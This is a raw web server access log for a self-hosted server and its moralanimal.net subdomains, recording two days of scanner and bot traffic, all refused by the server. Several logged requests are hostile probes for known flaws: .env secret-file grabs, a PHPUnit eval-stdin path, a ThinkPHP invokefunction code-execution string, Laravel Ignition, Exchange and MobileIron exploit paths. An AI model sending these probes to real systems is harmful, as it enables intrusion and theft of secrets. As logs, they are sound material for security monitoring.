"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Nov/2021:01:17:09 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Nov/2021:01:22:21 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.46.14] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [20/Nov/2021:01:27:48 +0000] 400 - GET http 64.22.31.253 "/" [Client 192.241.201.179] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Nov/2021:01:44:14 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Nov/2021:01:45:20 +0000] 444 - GET https 64.22.31.253 "/cgi-bin/config.exp" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Nov/2021:01:53:05 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Nov/2021:01:53:06 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Nov/2021:01:59:54 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 92.118.160.5] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [20/Nov/2021:02:28:11 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.207.42] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Nov/2021:02:53:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.173.35.17] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [20/Nov/2021:03:08:32 +0000] 444 - GET https speedtest.moralanimal.net "/" [Client 34.96.130.29] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [20/Nov/2021:03:25:09 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Nov/2021:03:43:37 +0000] 444 - GET https 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [20/Nov/2021:03:56:26 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [20/Nov/2021:04:12:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Nov/2021:04:19:09 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Nov/2021:04:28:36 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Nov/2021:05:31:43 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.212.44] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Nov/2021:05:33:31 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.212.246] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Nov/2021:05:33:38 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.213.113] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Nov/2021:05:49:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Nov/2021:06:25:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Nov/2021:06:26:05 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.213.169] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Nov/2021:06:43:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.79] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Nov/2021:07:22:57 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [20/Nov/2021:07:37:12 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 45.87.61.71] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [20/Nov/2021:07:38:55 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 92.118.160.13] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [20/Nov/2021:08:13:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.233.62.116] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [20/Nov/2021:08:28:24 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [20/Nov/2021:08:28:24 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [20/Nov/2021:08:52:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Nov/2021:09:18:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.213.64] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Nov/2021:10:44:27 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 194.127.178.31] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [20/Nov/2021:10:48:04 +0000] 444 - GET https 64.22.31.253 "/Telerik.Web.UI.WebResource.axd?type=rau" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Nov/2021:13:04:56 +0000] 444 - GET https 64.22.31.253 "/web/index.html" [Client 92.118.160.57] [Length 0] [Gzip -] "Go http package" "-" [20/Nov/2021:15:11:53 +0000] 400 - GET http localhost "/" [Client 80.82.70.228] [Length 654] [Gzip -] "Mozilla/5.0 (Linux; U; Android 6.0; en-US; Redmi Note 4 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 UCBrowser/12.13.0.1207 Mobile Safari/537.36" "-" [20/Nov/2021:15:12:33 +0000] 400 - GET http 64.22.31.253 "/" [Client 5.8.10.202] [Length 252] [Gzip -] "fasthttp" "-" [20/Nov/2021:15:12:33 +0000] 444 - GET https 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [20/Nov/2021:15:12:33 +0000] 400 - GET http 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [20/Nov/2021:15:12:34 +0000] 444 - GET https 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [20/Nov/2021:15:12:34 +0000] 400 - GET http 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [20/Nov/2021:15:12:43 +0000] 444 - GET https 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [20/Nov/2021:15:12:43 +0000] 400 - GET http 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [20/Nov/2021:15:12:44 +0000] 444 - GET https 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [20/Nov/2021:15:12:44 +0000] 400 - GET http 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [20/Nov/2021:15:14:48 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [20/Nov/2021:17:21:59 +0000] 444 - GET https 64.22.31.253 "/remote/login" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Nov/2021:18:04:26 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Nov/2021:18:04:26 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Nov/2021:18:04:26 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Nov/2021:18:04:26 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Nov/2021:18:04:26 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Nov/2021:18:04:26 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Nov/2021:18:19:04 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Nov/2021:18:49:41 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Nov/2021:19:37:05 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Nov/2021:20:16:37 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.46.14] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [20/Nov/2021:20:46:36 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 45.201.206.80] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [20/Nov/2021:21:10:32 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [20/Nov/2021:21:46:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Nov/2021:22:50:30 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Nov/2021:23:40:10 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.207.66] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Nov/2021:00:12:59 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Nov/2021:00:22:10 +0000] 400 - GET http 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [21/Nov/2021:00:30:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Nov/2021:00:41:24 +0000] 400 - - http localhost "-" [Client 94.232.40.67] [Length 154] [Gzip -] "-" "-" [21/Nov/2021:00:41:24 +0000] 400 - - http localhost "-" [Client 94.232.40.67] [Length 154] [Gzip -] "-" "-" [21/Nov/2021:01:10:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Nov/2021:01:31:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Nov/2021:02:04:22 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [21/Nov/2021:02:31:40 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.214.153] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Nov/2021:03:56:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Nov/2021:06:38:57 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.195.41] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Nov/2021:07:09:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.2] [Length 0] [Gzip -] "-" "-" [21/Nov/2021:07:23:10 +0000] 444 - GET https 64.22.31.253 "/resolve?name=dnsscan.shadowserver.org&type=A" [Client 64.62.197.2] [Length 0] [Gzip -] "-" "-" [21/Nov/2021:07:46:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.140.248.32] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [21/Nov/2021:09:47:04 +0000] 400 - - http localhost "-" [Client 87.251.75.145] [Length 154] [Gzip -] "-" "-" [21/Nov/2021:10:01:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.212.92] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Nov/2021:10:15:27 +0000] 400 - POST http 64.22.31.253 "/13164952" [Client 212.102.35.142] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36" "-" [21/Nov/2021:10:20:55 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [21/Nov/2021:10:20:56 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [21/Nov/2021:10:40:29 +0000] 400 - POST http 64.22.31.253 "/" [Client 191.96.168.81] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36" "-" [21/Nov/2021:11:09:57 +0000] 444 - GET https traefik.moralanimal.net "/" [Client 92.118.160.17] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [21/Nov/2021:11:10:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.114] [Length 0] [Gzip -] "-" "-" [21/Nov/2021:11:10:36 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.114] [Length 252] [Gzip -] "-" "-" [21/Nov/2021:11:10:36 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.114] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [21/Nov/2021:12:01:54 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.46.14] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [21/Nov/2021:13:16:36 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [21/Nov/2021:13:16:36 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [21/Nov/2021:13:26:28 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 205.185.115.39] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [21/Nov/2021:13:40:34 +0000] 444 - GET https localhost "/" [Client 8.217.113.78] [Length 0] [Gzip -] "-" "-" [21/Nov/2021:13:40:35 +0000] 444 - OPTIONS https localhost "/" [Client 8.217.113.78] [Length 0] [Gzip -] "-" "-" [21/Nov/2021:13:40:36 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 8.217.113.78] [Length 0] [Gzip -] "-" "-" [21/Nov/2021:13:40:37 +0000] 400 - - https localhost "-" [Client 8.217.113.78] [Length 154] [Gzip -] "-" "-" [21/Nov/2021:13:40:42 +0000] 400 - - https localhost "-" [Client 8.217.113.78] [Length 0] [Gzip -] "-" "-" [21/Nov/2021:13:40:43 +0000] 400 - - https localhost "-" [Client 8.217.113.78] [Length 154] [Gzip -] "-" "-" [21/Nov/2021:13:40:44 +0000] 400 - - https localhost "-" [Client 8.217.113.78] [Length 154] [Gzip -] "-" "-" [21/Nov/2021:13:40:45 +0000] 400 - - https localhost "-" [Client 8.217.113.78] [Length 154] [Gzip -] "-" "-" [21/Nov/2021:13:40:46 +0000] 400 - - https localhost "-" [Client 8.217.113.78] [Length 154] [Gzip -] "-" "-" [21/Nov/2021:13:40:46 +0000] 400 - - https localhost "-" [Client 8.217.113.78] [Length 154] [Gzip -] "-" "-" [21/Nov/2021:13:40:47 +0000] 400 - - https localhost "-" [Client 8.217.113.78] [Length 154] [Gzip -] "-" "-" [21/Nov/2021:13:42:48 +0000] 444 - GET https 64.22.31.253 "/text4041637501997" [Client 8.217.113.78] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [21/Nov/2021:13:42:49 +0000] 400 - GET http 64.22.31.253 "/text4041637501997" [Client 8.217.113.78] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [21/Nov/2021:13:42:49 +0000] 444 - GET https localhost "/" [Client 8.217.113.78] [Length 0] [Gzip -] "-" "-" [21/Nov/2021:13:42:50 +0000] 400 - GET http localhost "/" [Client 8.217.113.78] [Length 252] [Gzip -] "-" "-" [21/Nov/2021:13:42:50 +0000] 444 - POST https 64.22.31.253 "/sdk" [Client 8.217.113.78] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [21/Nov/2021:13:42:50 +0000] 444 - GET https 64.22.31.253 "/evox/about" [Client 8.217.113.78] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [21/Nov/2021:13:42:50 +0000] 400 - POST http 64.22.31.253 "/sdk" [Client 8.217.113.78] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [21/Nov/2021:13:42:51 +0000] 400 - GET http 64.22.31.253 "/evox/about" [Client 8.217.113.78] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [21/Nov/2021:13:42:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 8.217.113.78] [Length 0] [Gzip -] "-" "-" [21/Nov/2021:13:42:51 +0000] 444 - GET https 64.22.31.253 "/HNAP1" [Client 8.217.113.78] [Length 0] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [21/Nov/2021:13:42:51 +0000] 400 - GET http 64.22.31.253 "/" [Client 8.217.113.78] [Length 252] [Gzip -] "-" "-" [21/Nov/2021:13:42:52 +0000] 400 - GET http 64.22.31.253 "/HNAP1" [Client 8.217.113.78] [Length 252] [Gzip -] "Mozilla/5.0 (compatible;)" "-" [21/Nov/2021:13:43:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 8.217.113.78] [Length 0] [Gzip -] "-" "-" [21/Nov/2021:13:43:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 8.217.113.78] [Length 0] [Gzip -] "curl/7.75.0" "-" [21/Nov/2021:14:11:41 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Nov/2021:14:11:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Nov/2021:16:33:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.213.136] [Length 0] [Gzip -] "-" "-" [21/Nov/2021:17:15:57 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [21/Nov/2021:17:23:10 +0000] 444 - GET https 64.22.31.253 "/owa/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Nov/2021:17:41:58 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Nov/2021:18:04:20 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Nov/2021:18:04:20 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Nov/2021:18:04:20 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Nov/2021:18:04:20 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Nov/2021:18:04:20 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Nov/2021:18:04:20 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [21/Nov/2021:18:40:41 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Nov/2021:18:55:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.9] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [21/Nov/2021:19:14:40 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Nov/2021:20:27:21 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.195.22] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Nov/2021:20:31:04 +0000] 444 - GET https 64.22.31.253 